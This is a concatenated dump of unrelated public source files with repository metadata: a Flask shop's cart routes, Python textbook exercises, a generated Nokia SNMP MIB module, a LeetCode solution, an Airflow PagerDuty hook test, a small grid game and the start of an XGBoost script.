return render_template('shop/index.html', **context)
@shop.route('/product', methods=['GET'])
def single():
product_id = request.args.get('id')
context = {
'p': Product.query.get(product_id)
}
return render_template('shop/single.html', **context)
@shop.route('/category', methods=['GET'])
def category():
category_id = request.args.get('id')
print(request.args)
context = {
'category': Category.query.get(category_id),
'products': Product.query.filter_by(category_id=category_id).all()
}
return render_template('shop/index.html', **context)
@shop.route('/cart', methods=['GET'])
def show_cart():
if current_user.is_anonymous:
context = {
'products': []
}
else:
context = {
'products': [Product.query.get(i.product_id) for i in Cart.query.filter_by(user_id=current_user.id).all()]
}
return render_template('shop/cart.html', **context)
@shop.route('/cart/remove', methods=['GET'])
def delete_from_cart():
product_id = request.args.get('id')
[db.session.delete(i) for i in Cart.query.filter_by(product_id=product_id).all()]
db.session.commit()
flash(f'{Product.query.get(product_id).name} removed successfully.', 'warning')
return redirect(url_for('shop.show_cart'))
@shop.route('/cart/add', methods=['GET'])
def add_to_cart():
user = User.query.get(current_user.id)
if not user.is_customer:
user.is_customer = True
db.session.commit()
product_id = request.args.get('product_id')
data = {
'user_id': user.id,
'product_id': product_id,
}
cart = Cart()
cart.from_dict(data)
cart.save()
flash(f'{Product.query.get(product_id).name} added successfully', 'success')
return redirect(request.referrer)
|
[
"btnewman7@gmail.com"
] |
btnewman7@gmail.com
|
97179fb73975045ce078f06639e479f9e51d03b7
|
67a4d71c2f46069ee1c9da574fe13e503db4b67d
|
/pych-eight/8_6to8_8.py
|
f0637e14fef50e186e12dc07428c48cefab82c13
|
[] |
no_license
|
2648226350/Python_learn
|
3804c545755e17ecdc45d671d2f5b0899a59b034
|
87c362120124fcd23d14c0bdd4c72e7b8e2d48ba
|
refs/heads/master
| 2023-07-11T22:00:12.683588
| 2021-08-16T13:58:19
| 2021-08-16T13:58:19
| 396,794,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 656
|
py
|
#8-6
def city_country(name, country):
print("'"+name.title()+", "+country.title()+"'")
city_country('Santiago', 'Chile')
city_country('Peking', 'China')
city_country('London', 'England')
#8-7
def make_album(singer, album, number = 0):
if number != 0:
return {singer:album,'number':number}
else:
return {singer:album}
print(make_album('Jach','Aaaa',3))
print(make_album('mj','Bbb'))
#8-8
singer = input("Please input the singer. ")
album = input("Please input the album. ")
while singer != 'quit':
print(make_album(singer, album))
singer = input("Please input the singer. ")
album = input("Please input the album. ")
|
[
"2648226350@qq.com"
] |
2648226350@qq.com
|
04b8ed50c24c320d25836ef6911aab27ca4dc7b7
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp-with-texts/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP.py
|
da7cb8b996dbd193802a4c80260e2d37c3f3b78e
|
[
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395
| 2019-08-16T15:51:41
| 2019-08-16T15:53:57
| 237,512,469
| 0
| 0
|
Apache-2.0
| 2020-01-31T20:41:36
| 2020-01-31T20:41:35
| null |
UTF-8
|
Python
| false
| false
| 17,953
|
py
|
#
# PySNMP MIB module NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP
# Produced by pysmi-0.3.4 at Wed May 1 14:23:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint")
NoiAdditionalText, NoiEventTime, NoiAlarmTableCount = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-COMMON-DEFINITION", "NoiAdditionalText", "NoiEventTime", "NoiAlarmTableCount")
NoiMeasurementJobStatus, NoiMeasurementResultTransfer, NoiMeasurementResultIdentifier, NoiMeasurementFileTransfer, NoiMeasurementFileName, NoiMeasurementActivationError, NoiMeasurementFileDirectory = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-COMMON-DEFINITION", "NoiMeasurementJobStatus", "NoiMeasurementResultTransfer", "NoiMeasurementResultIdentifier", "NoiMeasurementFileTransfer", "NoiMeasurementFileName", "NoiMeasurementActivationError", "NoiMeasurementFileDirectory")
noiPmTable, noiPmCompliance, noiPmVariable, noiOpenInterfaceModule, noiPmNotification = mibBuilder.importSymbols("NOKIA-NE3S-REGISTRATION-MIB", "noiPmTable", "noiPmCompliance", "noiPmVariable", "noiOpenInterfaceModule", "noiPmNotification")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Gauge32, ModuleIdentity, NotificationType, Bits, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, iso, ObjectIdentity, Counter32, Counter64, TimeTicks, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "ModuleIdentity", "NotificationType", "Bits", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "iso", "ObjectIdentity", "Counter32", "Counter64", "TimeTicks", "Integer32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
noiSnmpPmIrp = ModuleIdentity((1, 3, 6, 1, 4, 1, 94, 7, 1, 1, 4))
noiSnmpPmIrp.setRevisions(('1970-01-01 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: noiSnmpPmIrp.setRevisionsDescriptions(('Version 1.0.6',))
if mibBuilder.loadTexts: noiSnmpPmIrp.setLastUpdated('200227020000Z')
if mibBuilder.loadTexts: noiSnmpPmIrp.setOrganization('Nokia Networks')
if mibBuilder.loadTexts: noiSnmpPmIrp.setContactInfo('e-mail: NET-OSS-OPEN-SNMP DL (Microsoft Outlook, Nokia internal) DL.NET-OSS-OPEN-SNMP-DL@nokia.com')
if mibBuilder.loadTexts: noiSnmpPmIrp.setDescription('This SNMP MIB-module specifies the SNMP Solution Set of the PM Integration Reference Point (IRP) also known as Enhanced SNMP Solution Suite. The purpose of this IRP is to define an interface though which a network element manager or a network element) can communicate PM information for its managed objects to Nokia OS, NetAct.')
noiPmIrpVersion = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmIrpVersion.setStatus('current')
if mibBuilder.loadTexts: noiPmIrpVersion.setDescription("This object represents the version of the PM IRP supported by the agent. The format is 'n.m,o', where 'n' is the main version number of the interface model and 'm' and 'o' the release number within the main version. This version is 1.0.6")
noiPmFileTransferProtocol = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 2), NoiMeasurementFileTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileTransferProtocol.setStatus('current')
if mibBuilder.loadTexts: noiPmFileTransferProtocol.setDescription('Contains the supported file transfer mechanism for various files within NE3S. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiPmResultTransfer = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 3), NoiMeasurementResultTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmResultTransfer.setStatus('current')
if mibBuilder.loadTexts: noiPmResultTransfer.setDescription('Contains the supported transfer mechanism for measurement result, e.g. notification based or polling based. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementScheduleFileDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 4), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setDescription('Contains the directory where the measurement schedule file is stored within the agent. The manager polls the value before downloading the measurement file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 5), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setDescription('Contains the directory where the measurement repository file is stored within the agent. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryFile = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 6), NoiMeasurementFileName()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setDescription('Contains the file name of the repository file. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementJobStatus = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 7), NoiMeasurementJobStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementJobStatus.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementJobStatus.setDescription('This object represent the measurement job status. The agent will update the value according to the state model defined in the interface specification.')
noiMeasurementActivationError = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 8), NoiMeasurementActivationError()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementActivationError.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementActivationError.setDescription('Contains the error code in case of failure in measurement administration.')
noiPmAdditionalText = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 9), NoiAdditionalText()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmAdditionalText.setStatus('current')
if mibBuilder.loadTexts: noiPmAdditionalText.setDescription('Contains additional text and is used in conjunction with the notification noiMeasurementResultTableRebuild and in case of failure in measurement administration.')
noiPmFileStoringPeriod = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 10), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setStatus('current')
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setDescription(' Contains the storage duraion for the measurement file in the agent. Duration in minutes. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementResultTableCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 1), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setDescription('Contains the number or current active entries in the measurement table. When the table is empty, the value of this object is zero (0).')
noiMeasurementResultTableMaxCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 2), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setDescription('Contains the maximum number of entries in the in the measurement table.')
noiPmLastMeasurementResultId = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 3), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setStatus('current')
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setDescription('This object represent the measurement identifier of last send notification noiMeasurementResultReady The manager can retrieve the current value of this object to detect lost notifications. This mechanism can be used by the manager when no notification is received for a certain time (e.g. 30 minutes) to evaluate whether an retrieval of of entries from the measurement table shall be performed')
noiMeasurementResultTable = MibTable((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4), )
if mibBuilder.loadTexts: noiMeasurementResultTable.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTable.setDescription('Table containing information about the measurement files that are currently stored in the Network Element and accessible for the manager. Agent will create a new entry, whenever a new measurement file has been created. When removing a measurement file, the corresponding entry in the table must be removed.')
noiMeasurementResultEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1), ).setIndexNames((0, "NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"))
if mibBuilder.loadTexts: noiMeasurementResultEntry.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultEntry.setDescription('One entry in the measurement table, containing the information of one measurement file.')
noiMeasurementResultIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 1), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setDescription('This object represents the measurement identifier of an entry in the measurement table. It uniquely identifies an entry in the table.')
noiMeasurementFileName = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 2), NoiMeasurementFileName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileName.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileName.setDescription('This object represents the file name of a measurement result file.')
noiMeasurementFileDirectory = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 3), NoiMeasurementFileDirectory()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setDescription('This object represents the full path of a measurement resulta file.')
noiPmEventTime = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 4), NoiEventTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmEventTime.setStatus('current')
if mibBuilder.loadTexts: noiPmEventTime.setDescription('This object represents the time the event occured.')
noiMeasurementResultReady = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultReady.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultReady.setDescription('This notification is used when a new measurement data file has been created and a new entry in the measurement table has been inserted.')
noiMeasurementResultTableRebuild = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmAdditionalText"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setDescription('This notification is used when the measurement table in the agent has been rebuild. The notification will be emitted after the measurement table has been dropped and all previously stored entries have been removed')
noiPmIRPCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmMandatoryGroup"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmNotificationOptionalGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmIRPCompliance = noiPmIRPCompliance.setStatus('current')
if mibBuilder.loadTexts: noiPmIRPCompliance.setDescription('This specifies the objects that are required to claim compliance to NE3S PM Fragment.')
noiPmMandatoryGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmIrpVersion"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmLastMeasurementResultId"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementScheduleFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableMaxCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmFileStoringPeriod"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmMandatoryGroup = noiPmMandatoryGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmMandatoryGroup.setDescription('A collection of objects that represents mandatory PM attributes.')
noiPmNotificationOptionalGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 3)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultReady"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableRebuild"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmNotificationOptionalGroup = noiPmNotificationOptionalGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmNotificationOptionalGroup.setDescription('A collection of optional measurement notifications.')
mibBuilder.exportSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", noiPmMandatoryGroup=noiPmMandatoryGroup, noiMeasurementResultIdentifier=noiMeasurementResultIdentifier, noiSnmpPmIrp=noiSnmpPmIrp, noiMeasurementFileDirectory=noiMeasurementFileDirectory, noiMeasurementResultTableCount=noiMeasurementResultTableCount, noiPmIrpVersion=noiPmIrpVersion, noiPmNotificationOptionalGroup=noiPmNotificationOptionalGroup, noiMeasurementJobStatus=noiMeasurementJobStatus, noiMeasurementFileName=noiMeasurementFileName, noiMeasurementResultTableRebuild=noiMeasurementResultTableRebuild, noiPmEventTime=noiPmEventTime, noiPmLastMeasurementResultId=noiPmLastMeasurementResultId, noiMeasurementResultEntry=noiMeasurementResultEntry, noiPmResultTransfer=noiPmResultTransfer, noiPmFileStoringPeriod=noiPmFileStoringPeriod, noiMeasurementActivationError=noiMeasurementActivationError, noiPmAdditionalText=noiPmAdditionalText, noiMeasurementResultTable=noiMeasurementResultTable, noiMeasurementScheduleFileDirectory=noiMeasurementScheduleFileDirectory, noiMeasurementRepositoryDirectory=noiMeasurementRepositoryDirectory, noiMeasurementResultReady=noiMeasurementResultReady, noiMeasurementRepositoryFile=noiMeasurementRepositoryFile, noiMeasurementResultTableMaxCount=noiMeasurementResultTableMaxCount, noiPmIRPCompliance=noiPmIRPCompliance, noiPmFileTransferProtocol=noiPmFileTransferProtocol, PYSNMP_MODULE_ID=noiSnmpPmIrp)
|
[
"dcwangmit01@gmail.com"
] |
dcwangmit01@gmail.com
|
14e91d5ff3559bb2e7cbecab0ad3db1f1db77c3b
|
323317f286577a719f2bdaecd9f1afa820c0b9a5
|
/1588 - Sum of All Odd Length Subarrays.py
|
abbb31ae6381b2dbf42b691a6dbe8f7b74680598
|
[] |
no_license
|
AlexisDongMariano/leetcode
|
e896a69e58c438c3e9a0c7319fc69e2e4182fc9e
|
db9d529d935bc5e730c194b2c8bf9008bc65d8ca
|
refs/heads/main
| 2023-04-09T10:17:27.036420
| 2021-04-26T06:03:31
| 2021-04-26T06:03:31
| 329,826,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
# ==============================
# Information
# ==============================
# Title: 1588 - Sum of All Odd Length Subarrays
# Link: https://leetcode.com/problems/sum-of-all-odd-length-subarrays/
# Difficulty: Easy
# Language: Python
# Problem:
# Given an array of positive integers arr, calculate the sum of all possible odd-length subarrays.
# A subarray is a contiguous subsequence of the array.
# Return the sum of all odd-length subarrays of arr.
# Example
# Input: arr = [1,4,2,5,3]
# Output: 58
# Explanation: The odd-length subarrays of arr and their sums are:
# [1] = 1
# [4] = 4
# [2] = 2
# [5] = 5
# [3] = 3
# [1,4,2] = 7
# [4,2,5] = 11
# [2,5,3] = 10
# [1,4,2,5,3] = 15
# If we add all these together we get 1 + 4 + 2 + 5 + 3 + 7 + 11 + 10 + 15 = 58
# ==============================
# Solution
# ==============================
def sum_length_all_subarrays(arr):
subarray_sum = 0
length = len(arr)
i = 0
while i <= length-1:
for j in range(0, length - i):
subarray_sum += sum(arr[j:(j + i) + 1])
i += 2
return subarray_sum
arr = arr = [1,4,2,5,3]
print(sum_length_all_subarrays(arr))
|
[
"alexisdongmariano@gmail.com"
] |
alexisdongmariano@gmail.com
|
767c2bfac9638826491205fbf82df7b3dfcd3672
|
6169a0af24553278c9493c9ac14d2351e9085afd
|
/tests/providers/pagerduty/hooks/test_pagerduty_events.py
|
3c68ba8247954e373fa2502a56287ba653a750a3
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
Nextdoor/airflow
|
c994f8fbaf48bebd891300f44dd78a58fd0b057b
|
863ec46e25ea49d6d5b006d8fd3a83f50aa9db79
|
refs/heads/master
| 2023-06-12T19:25:58.052324
| 2023-01-20T17:43:14
| 2023-01-20T17:43:14
| 54,076,271
| 7
| 8
|
Apache-2.0
| 2023-06-05T20:38:53
| 2016-03-17T00:34:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,285
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import pytest
from airflow.models import Connection
from airflow.providers.pagerduty.hooks.pagerduty import PagerdutyEventsHook
from airflow.utils import db
DEFAULT_CONN_ID = "pagerduty_events_default"
@pytest.fixture(scope="class")
def events_connections():
db.merge_conn(Connection(conn_id=DEFAULT_CONN_ID, conn_type="pagerduty_events", password="events_token"))
class TestPagerdutyEventsHook:
def test_get_integration_key_from_password(self, events_connections):
hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
assert hook.integration_key == "events_token", "token initialised."
def test_token_parameter_override(self, events_connections):
hook = PagerdutyEventsHook(integration_key="override_key", pagerduty_events_conn_id=DEFAULT_CONN_ID)
assert hook.integration_key == "override_key", "token initialised."
def test_create_event(self, requests_mock, events_connections):
hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
mock_response_body = {
"status": "success",
"message": "Event processed",
"dedup_key": "samplekeyhere",
}
requests_mock.post("https://events.pagerduty.com/v2/enqueue", json=mock_response_body)
resp = hook.create_event(
summary="test",
source="airflow_test",
severity="error",
)
assert resp == mock_response_body
|
[
"noreply@github.com"
] |
noreply@github.com
|
854a55f2e40b628ef1f15c8ccb0cc9d75eb0bcfd
|
a9d8a58ed7a950fee3ee6514f33da7fd47c54906
|
/Dev1.py
|
4969e1ee84cdd06ebfc168ce8e1d494d2845a1b4
|
[] |
no_license
|
sms632/PrincessRescue
|
68cf5c696457735f08af6bd525b0ec89f0df1356
|
e143a54b03fb130ee14461381fcbc8c0df7edc4b
|
refs/heads/master
| 2016-09-05T16:49:26.556629
| 2014-02-18T03:50:36
| 2014-02-18T03:50:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,034
|
py
|
from livewires import games
import random
games.init(screen_width = 850, screen_height = 850, fps = 50)
class Grid(games.Sprite):
image = games.load_image("graphics/emptyGrid.png")
name = "Empty"
def __init__(self, x, y):
super(Grid, self).__init__(image = Grid.image,
x = x, y = y)
self.name = Grid.name
def die(self):
self.destroy()
class Ocean(games.Sprite):
image = games.load_image("graphics/emptyOcean.png")
canMove = True
name = "Ocean"
def __init__(self, x, y):
super(Ocean, self).__init__(image = Ocean.image,
x = x,
y = y)
self.name = Ocean.name
class Land(games.Sprite):
image = games.load_image("graphics/emptyLand.png")
canMove = False
name = "Land"
def __init__(self, x, y):
super(Land, self).__init__(image = Land.image,
x = x,
y = y)
self.name = Land.name
class Ship(games.Sprite):
""" A player controlled ship"""
canMove = True
def die(self):
self.destroy()
class Cruiser(Ship):
def die(self):
self.destroy()
class Carrier(Ship):
def die(self):
self.destroy()
class Destroyer(Ship):
image = games.load_image("graphics/ships/Leia/Destroyer.png")
name = "Destroyer"
def __init__(self, x, y):
super(Destroyer, self).__init__(image = Destroyer.image,
x = x,
y = y)
self.name = Destroyer.name
def die(self):
self.destroy()
class Selector(games.Sprite):
image = games.load_image("graphics/selector.png")
inputDelay = 10
def __init__(self, Grid):
super(Selector, self).__init__(image = Selector.image,
x = Grid.x,
y = Grid.y)
self.inputDelay = Selector.inputDelay
def update(self):
if self.inputDelay > 0:
self.inputDelay -= 1
elif self.inputDelay == 0:
if games.keyboard.is_pressed(games.K_LEFT):
self.x = self.x - 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_RIGHT):
self.x = self.x + 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_UP):
self.y = self.y - 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_DOWN):
self.y = self.y + 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_SPACE):
print(self.overlapping_sprites[0].name)
print(self.x)
print(self.y)
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_d):
for sprite in self.overlapping_sprites:
sprite.die()
#add ocean at curser
if games.keyboard.is_pressed(games.K_o):
ocean = Ocean(self.x, self.y)
games.screen.add(ocean)
self.elevate()
self.inputDelay = 10
#add land at curser
if games.keyboard.is_pressed(games.K_p):
land = Land(self.x, self.y)
games.screen.add(land)
self.elevate()
self.inputDelay = 10
#add destroyer
if games.keyboard.is_pressed(games.K_i):
des = Destroyer(self.x, self.y)
games.screen.add(des)
self.elevate()
self.inputDelay = 10
class Pointer(object):
def __init__(self):
background = games.load_image("graphics/pointer.png", transparent = False)
class Menu(object):
def __init__(self):
background = games.load_image("graphics/menuBackground.png", transparent = False)
def show(self):
games.screen.add(background)
class Game(object):
"""the game"""
def newGameMenu(self):
menu_image = games.load_image("graphics/MenuBackground.png", transparent = False)
def play(self):
#create empty grid
x = 0
y = 0
#add basic grid
for i in range(16):
x = x + 50
y = 0
for j in range(16):
y = y + 50
grid = Grid(x, y)
games.screen.add(grid)
#add selection curser
selector = Selector(grid)
games.screen.add(selector)
wall_image = games.load_image("graphics/testBack.png", transparent = False)
games.screen.background = wall_image
games.screen.mainloop()
def main():
gameStart = Game()
gameStart.play()
main()
|
[
"sms632@gmail.com"
] |
sms632@gmail.com
|
a3a6a41f385fb6a0269c8f974db2ab292bb42810
|
1faf8c112d6e98afe64b4df91d0f7e730c27e0a7
|
/XGBoost.py
|
de02efabcb90c37c67df39faed48c72a41baa07d
|
[] |
no_license
|
Shinarthas/XGBoost
|
eff309c3dced28fc127b4024c5d6f3e745a3d76d
|
46e221abc23dc67fb7588fa37f18277e7df92240
|
refs/heads/master
| 2022-12-05T01:55:12.501075
| 2020-08-19T21:06:55
| 2020-08-19T21:06:55
| 288,837,727
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,250
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('Data.csv')
X = dataset.iloc[:, :-1].values # все кроме последней колонки
y = dataset.iloc[:, -1].values # только последняя колонка
# разодьем данные на тестовые и проверочные
from sklearn.model_selection import train_test_split
